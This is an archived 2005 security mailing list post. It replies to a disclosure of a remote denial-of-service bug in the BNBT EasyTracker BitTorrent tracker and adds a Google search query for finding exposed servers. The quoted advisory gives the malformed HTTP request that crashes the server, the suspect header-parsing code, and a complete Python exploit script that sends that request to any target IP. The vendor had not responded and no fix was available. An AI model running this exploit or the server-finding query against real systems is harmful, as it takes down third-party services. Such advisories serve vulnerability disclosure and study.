lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Date: Wed, 31 Aug 2005 16:52:24 +0800
From: "Sowhat ." <smaillist@...il.com>
To: bugtraq@...urityfocus.com, full-disclosure@...ts.grok.org.uk
Subject: Re: BNBT EasyTracker Remote Denial of Service
	Vulnerability


To find out BNBT servers, Google:  intitle:"bnbt" inurl:":6969"

On 8/30/05, Sowhat . <smaillist@...il.com> wrote:
> 
> 
> BNBT EasyTracker Remote Denial of Service Vulnerability
> 
> by Sowhat
> 
> Last Update:2005.08.30
> 
> http://secway.org/advisory/AD20050830.txt
> 
> Vendor:
> 
> http://bnbteasytracker.sourceforge.net/
> 
> Product Affected:
> 
> 7.7r3.2004.10.27 and below
> 
> Overview:
> 
> BNBT was written by Trevor Hogan. BNBT is a complete port 
> of the original Python BitTorrent tracker to C++ for speed
> and efficiency. BNBT also offers many additional features
> beyond the original Python BitTorrent tracker, plus it's 
> easy to use and customizable. BNBT is covered under the GNU
>  Lesser General Public License (LGPL).
> 
> A Denial of Service vulnerability exists within BNBT which
> allows for an attacker to cause the BNBT to stop responding. 
> 
> Details:
> 
> A specifically crafted HTTP request will cause the BNBT 
> Server stop responding.
> 
> Sending a request like "GET /index.htm HTTP/1.1\r\n:\r\n\r\n"
> will reproduce the problem. It seems that the bug is located
> in client.cpp, "//grab headers" section. And it is something
> like " 1-2 = -1" and similar to memcpy(-1) ? 
> 
> // grab headers
> 
>  string :: size_type iNewLine = m_strReceiveBuf.find( "\r\n" );
>  string :: size_type iDoubleNewLine = m_strReceiveBuf.find( "\r\n\r\n" );
> 
>  strTemp = m_strReceiveBuf.substr( iNewLine + strlen( "\r\n" ),
> iDoubleNewLine - iNewLine - strlen( "\r\n" ) );
> 
>  while( 1 )
>  {
>   string :: size_type iSplit = strTemp.find( ":" );
>   string :: size_type iEnd = strTemp.find( "\r\n" );
> 
>   if( iSplit == string :: npos )
>   {
>    UTIL_LogPrint( "client warning - malformed HTTP request (bad header)\n"
> );
> 
>    break;
>   }
> 
>   string strKey = strTemp.substr( 0, iSplit );
>   string strValue = strTemp.substr( iSplit + strlen( ": " ), iEnd - iSplit -
> strlen( "\r\n" ) );//Bug here ??
> 
>   rqst.mapHeaders.insert( pair<string, string>( strKey, strValue ) );
> 
>   strTemp = strTemp.substr( iEnd + strlen( "\r\n" ) );
> 
>   if( iEnd == string :: npos )
>    break;
>  }
> 
> However, I am not quite sure about that and it seems that
> it is only a D.O.S so I havnt deep into it. 
>  
> 
> Exploit:
> 
> //BNBTDOS.py
> # BNBT EasyTracker Remote D.O.S Exploit
> # Bug discoverd and coded by Sowhat
> # http://secway.org
> 
> # Version 7.7r3.2004.10.27 and below
> # the BNBT project: 
> http://bnbteasytracker.sourceforge.net/
>  
> import sys
> import string
> import socket
> 
> if (len(sys.argv) != 2):
>  print "\nUsage: " + sys.argv[0] + " TargetIP\n"
>  print
> "##################################################################"
>  print "#                                                  
>              #" 
>  print "#          BNBT EasyTracker Remote D.O.S Exploit                 #"
>  print "#           Bug discoverd and coded by Sowhat                    #"
>  print "#              http://secway.org                             
>    #"
>  print
> "##################################################################"
>  sys.exit(0)
> 
> host = sys.argv[1]
> port = 6969
> 
> 
> payload  = "GET /index.htm HTTP/1.1\r\n:\r\n\r\n"
> 
> s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
> s.connect((host,port))
> s.send(payload)
> 
> 
> WORKAROUND:
> 
> No WORKAROUND this time.
> plz check the vendor's website for update
> Maybe there will be a patch later (?)
> 
> Vendor Response:
> 
> 2005.08.22 Vendor notified via Webform,no email found 
> 2005.08.30 Vendor no response. Advisory Released
> 
> "Life is like a bug, Do you know how to exploit it ?"
> 
> 
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ